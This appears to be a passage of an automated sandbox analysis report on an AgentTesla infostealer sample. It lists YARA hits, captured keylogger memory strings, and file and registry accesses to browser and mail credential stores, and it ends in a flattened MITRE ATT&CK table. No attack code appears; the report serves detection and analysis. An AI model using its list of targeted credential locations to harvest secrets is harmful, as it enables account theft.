                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp, Eschemyquote24573j33.exe, 00000004.00000002.4509927352.000000000337D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}r
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q9<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}rTHbq@N7
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}rTe]q
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}THbq@N7
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q3<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\]qDTime: 11/19/2024 17:45:25<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}r
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Users\user\Desktop\Eschemyquote24573j33.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Users\user\Desktop\Eschemyquote24573j33.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4509557072.000000000319B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2259031078.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Eschemyquote24573j33.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7056, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 2892, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		31
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model31
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
